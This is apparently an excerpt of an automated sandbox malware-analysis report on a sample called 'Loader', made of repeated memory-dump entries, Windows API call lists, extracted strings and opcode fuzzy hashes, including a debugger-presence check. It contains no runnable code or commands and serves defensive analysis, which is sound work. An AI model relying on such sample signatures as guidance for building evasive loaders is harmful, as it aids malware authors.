                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: O*A$$[.]$'C$E$'G1Y$0_!Q$1K-M$D3C5$E{G}$F7UI$kW1i
                                                                                                                      • API String ID: 0-1249160011
                                                                                                                      • Opcode ID: 3778b98f0abbe60931399cc38bd04cb958d96acd4d00aa83d93d229c10c3937a
                                                                                                                      • Instruction ID: 222227fdfcc7c64e292eacc97805ef3840d4bb5e2b9aa69d5b1b8cc7a9c3525d
                                                                                                                      • Opcode Fuzzy Hash: 3778b98f0abbe60931399cc38bd04cb958d96acd4d00aa83d93d229c10c3937a
                                                                                                                      • Instruction Fuzzy Hash: 5D3214B0900A51CBCB24CF25C89667BB7B1FF62324B58828CD8A64F795E374DA41CBD1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ()$/.M$QW$Vn$Ym$ez$g$u|
                                                                                                                      • API String ID: 0-1058671686
                                                                                                                      • Opcode ID: e78aa084c4c321a80dc02e28b7b289c5d120aa9c27b98db2c08009eb66670112
                                                                                                                      • Instruction ID: a1b70dbf634f0af26020918e103df08305b4a7e55cd2da0329fecd7b1e3c1e14
                                                                                                                      • Opcode Fuzzy Hash: e78aa084c4c321a80dc02e28b7b289c5d120aa9c27b98db2c08009eb66670112
                                                                                                                      • Instruction Fuzzy Hash: 44A1C17590C3419BD310CF24D89066BBBE1EFD6354F088A2DE8D99B341D7748A46CB93
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __floor_pentium4
                                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                      • API String ID: 4168288129-2761157908
                                                                                                                      • Opcode ID: 7f2abfd2c4bb45a5ce379f0b944f2f1364583d971563adff48a5f0f597b7043a
                                                                                                                      • Instruction ID: c12612581ff7e367cde48317f0c722068c2012dc7f7634b15cd96425d1e4b805
                                                                                                                      • Opcode Fuzzy Hash: 7f2abfd2c4bb45a5ce379f0b944f2f1364583d971563adff48a5f0f597b7043a
                                                                                                                      • Instruction Fuzzy Hash: 9CD23875E086288FDB65CE28DC407EAB7F5EB56305F1541EAD40EE7240EB78AE818F41
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %$%$($($*$*$+$+
                                                                                                                      • API String ID: 0-157184678
                                                                                                                      • Opcode ID: 771904273cf5686b33b2d4e4e1e52caa0c0aa27a5d3c936dc4ab86ff94e7f889
                                                                                                                      • Instruction ID: b98fa98f1f5e6e70db2c4cb730d0c0ae6b4727dd1d88c036d09309d87479a016
                                                                                                                      • Opcode Fuzzy Hash: 771904273cf5686b33b2d4e4e1e52caa0c0aa27a5d3c936dc4ab86ff94e7f889
                                                                                                                      • Instruction Fuzzy Hash: AF612E7260D3D08FD328CE24D8D57ABBBD1AB92304F19886ED5CA9B392DB794944C743
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %$%$($($*$*$+$+
                                                                                                                      • API String ID: 0-157184678
                                                                                                                      • Opcode ID: 05a44f2d6d0c77c2411bae58e55dbb80ceeda9b6f23e6e1f0fdaa153d9306c35
                                                                                                                      • Instruction ID: 3ba41c581db6c30894550c567d5db4be7e2e80a3ab4d3d7637fa9ff0a0323509
                                                                                                                      • Opcode Fuzzy Hash: 05a44f2d6d0c77c2411bae58e55dbb80ceeda9b6f23e6e1f0fdaa153d9306c35
                                                                                                                      • Instruction Fuzzy Hash: 29515C7160C7D08FD329CF64D8E53ABBBD2AB92304F18886ED1CA87392DB794904C752
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %$%$($($*$*$+$+
                                                                                                                      • API String ID: 0-157184678
                                                                                                                      • Opcode ID: f55f467813c77472f1d33d89f98ab437b0b2d48317a4611e462e1f450e63769e
                                                                                                                      • Instruction ID: 49c84bb5fe6114a75849f7a7fab794fd86f602c3c2644b14e746f83caaa25178
                                                                                                                      • Opcode Fuzzy Hash: f55f467813c77472f1d33d89f98ab437b0b2d48317a4611e462e1f450e63769e
                                                                                                                      • Instruction Fuzzy Hash: 1B51197154C3D08FD3298B34D8D53AB7BD1AB92314F19886ED5CA87392CF7A8441C746
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %$%$($($*$*$+$+
                                                                                                                      • API String ID: 0-157184678
                                                                                                                      • Opcode ID: b9fb67ced526085a6b7285c34aae30912587b43d3c2c61361ff119072fabdd2a
                                                                                                                      • Instruction ID: 3393e8727a3aceb1813f9911903408c123a0d251321222d4eb3830703c37f5c4
                                                                                                                      • Opcode Fuzzy Hash: b9fb67ced526085a6b7285c34aae30912587b43d3c2c61361ff119072fabdd2a
                                                                                                                      • Instruction Fuzzy Hash: 9651297154C3D0CFD329CA24E8E63AA7BC1AF96304F5D886ED6CA97382D77984408743
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 17$89$SQ$Tt$W@$\2$`q
                                                                                                                      • API String ID: 0-3300596292
                                                                                                                      • Opcode ID: 8205c9663b21b75bb0ca0f70064e668f51a9c16a3b16e9e41f07dcda829d3831
                                                                                                                      • Instruction ID: 2add08f4997f586e387dd53a6c9d072a4c5a18dd506d08b69a327640e60aced7
                                                                                                                      • Opcode Fuzzy Hash: 8205c9663b21b75bb0ca0f70064e668f51a9c16a3b16e9e41f07dcda829d3831
                                                                                                                      • Instruction Fuzzy Hash: 8C42D8B45493858AE374CF129581BCFBBE1BB92744F208E1DC5E96B255DB70808ACF93
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8$:;:9$D'5%$H#Y!$M/_-$T]R#$o+X)
                                                                                                                      • API String ID: 0-5659241
                                                                                                                      • Opcode ID: 90b4f8fd5d928662df6ded95e7363ef684a84cfac523fa7db2b06661427fa4a8
                                                                                                                      • Instruction ID: 7e2073b6275bd37098190e9230f59f2d11091007adab8c07d7c55c4a223bf4a7
                                                                                                                      • Opcode Fuzzy Hash: 90b4f8fd5d928662df6ded95e7363ef684a84cfac523fa7db2b06661427fa4a8
                                                                                                                      • Instruction Fuzzy Hash: 42B1CF7510C3C18AE735CF258454BEBBBE2EFA2304F1849ADD4D99B292D735850ACB93
                                                                                                                      APIs
                                                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,001ACE1D,00000002,00000000,?,?,?,001ACE1D,?,00000000), ref: 001ACB98
                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,001ACE1D,00000002,00000000,?,?,?,001ACE1D,?,00000000), ref: 001ACBC1
                                                                                                                      • GetACP.KERNEL32(?,?,001ACE1D,?,00000000), ref: 001ACBD6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoLocale
                                                                                                                      • String ID: ACP$OCP
                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                      • Opcode ID: 50fc947b0682e007ee568eddd24dfc9ed0bf82ef3d5b0da16e4fae2313d2360f
                                                                                                                      • Instruction ID: ce9f0c1a18ffe047ce796ddd8f919acc9faff751f420c6b07d3a132a0cab4665
                                                                                                                      • Opcode Fuzzy Hash: 50fc947b0682e007ee568eddd24dfc9ed0bf82ef3d5b0da16e4fae2313d2360f
                                                                                                                      • Instruction Fuzzy Hash: 1321867A644104AADB359F58C903AA7B3A6AF56BA0B568464E90AE7101F733DE40C3F0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: /.-,$88&$88&$>8&$>8&$P
                                                                                                                      • API String ID: 0-229866786
                                                                                                                      • Opcode ID: 8ec3bc13e787c11419745f3ad0514da99d47f4cd6425247e71601e015963bd27
                                                                                                                      • Instruction ID: 6a6d6816708f191522289ad3a40e9040731ceb0dd0defb1790f0f4e5af3f6ca2
                                                                                                                      • Opcode Fuzzy Hash: 8ec3bc13e787c11419745f3ad0514da99d47f4cd6425247e71601e015963bd27
                                                                                                                      • Instruction Fuzzy Hash: 5FC134329183628FD329CE18C89036FB6E1EBC5714F15863DE8A9AB3C2D7759D0987C1
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 001A5145: GetLastError.KERNEL32(?,00000000,0019FAAF,?,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A5149
                                                                                                                        • Part of subcall function 001A5145: SetLastError.KERNEL32(00000000,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A51EB
                                                                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 001ACDE0
                                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 001ACE29
                                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 001ACE38
                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 001ACE80
                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 001ACE9F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 415426439-0
                                                                                                                      • Opcode ID: 1f7703440d2d8baf435880d1b64074628792ab3a812af521f704b6dbc332a125
                                                                                                                      • Instruction ID: 0035f00e3f13ea71b8f36073e71c013a83a0d137d69a834530de8848d3e61d73
                                                                                                                      • Opcode Fuzzy Hash: 1f7703440d2d8baf435880d1b64074628792ab3a812af521f704b6dbc332a125
                                                                                                                      • Instruction Fuzzy Hash: 4251A179A0060AABDB10EFA4CC41ABE7BB8BF56700F144439F514E7190EB709A44CBE1
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 001A5145: GetLastError.KERNEL32(?,00000000,0019FAAF,?,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A5149
                                                                                                                        • Part of subcall function 001A5145: SetLastError.KERNEL32(00000000,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A51EB
                                                                                                                      • GetACP.KERNEL32(?,?,?,?,?,?,001A16A3,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001AC431
                                                                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,001A16A3,?,?,?,00000055,?,-00000050,?,?), ref: 001AC45C
                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 001AC5BF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                                      • String ID: utf8
                                                                                                                      • API String ID: 607553120-905460609
                                                                                                                      • Opcode ID: bbebe72fbfb04b07f0333ab3ba8041359e1a77d8098785c2896eea13290b1dd9
                                                                                                                      • Instruction ID: 774c7b534eff5476c6dd441eed0c661d88ad61613c4e8fd60923798f9d578477
                                                                                                                      • Opcode Fuzzy Hash: bbebe72fbfb04b07f0333ab3ba8041359e1a77d8098785c2896eea13290b1dd9
                                                                                                                      • Instruction Fuzzy Hash: 2B712779B00306AADB28AB39CC46FBA73A8EF6A750F144429F515D7181FB74ED4087E4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0$0$0$@$i
                                                                                                                      • API String ID: 0-3124195287
                                                                                                                      • Opcode ID: a02d337b39e2843b5e0d4b20a7c4c744bb7c2108a04d61b6027daa769c6bfb40
                                                                                                                      • Instruction ID: c8302ee23234e577e628d761ba6a22c1df80bc1d9cc7a5699909f430d6d14319
                                                                                                                      • Opcode Fuzzy Hash: a02d337b39e2843b5e0d4b20a7c4c744bb7c2108a04d61b6027daa769c6bfb40
                                                                                                                      • Instruction Fuzzy Hash: 1772B271A083518FD71ACF28C490B6ABBE1AFE9704F188A6DE4D997391D334DD45CB82
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: /.-,$/.-,$88&$88&$88&
                                                                                                                      • API String ID: 0-3163543823
                                                                                                                      • Opcode ID: 9de5f1835d50790a1f05f7458c331f9ecbbd1b59609f1199f386c239a140f18a
                                                                                                                      • Instruction ID: 8e626f32b9457bce9a3d2c1d70fabe9a45b457dc0d73090e48e510a15374fba2
                                                                                                                      • Opcode Fuzzy Hash: 9de5f1835d50790a1f05f7458c331f9ecbbd1b59609f1199f386c239a140f18a
                                                                                                                      • Instruction Fuzzy Hash: 74A13732A28351DBE728CF14CC81BABB6D5EBC4704F54882DE988D72D3E63498548B92
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _strrchr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3213747228-0
                                                                                                                      • Opcode ID: 17a8af3533a897e6e906cec53c923a3a22616cf0740b16545c45100316cc9468
                                                                                                                      • Instruction ID: fc989dbeaa2db11030625bcaae41e600c31fac45933931283d4d715c98ff70b9
                                                                                                                      • Opcode Fuzzy Hash: 17a8af3533a897e6e906cec53c923a3a22616cf0740b16545c45100316cc9468
                                                                                                                      • Instruction Fuzzy Hash: 58B17A3AD002459FDF15CF68C8917FEBBA5EFA6340F15816AF904AB241D3B49D41CBA0
                                                                                                                      APIs
                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00197514
                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 001975E0
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001975F9
                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00197603
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
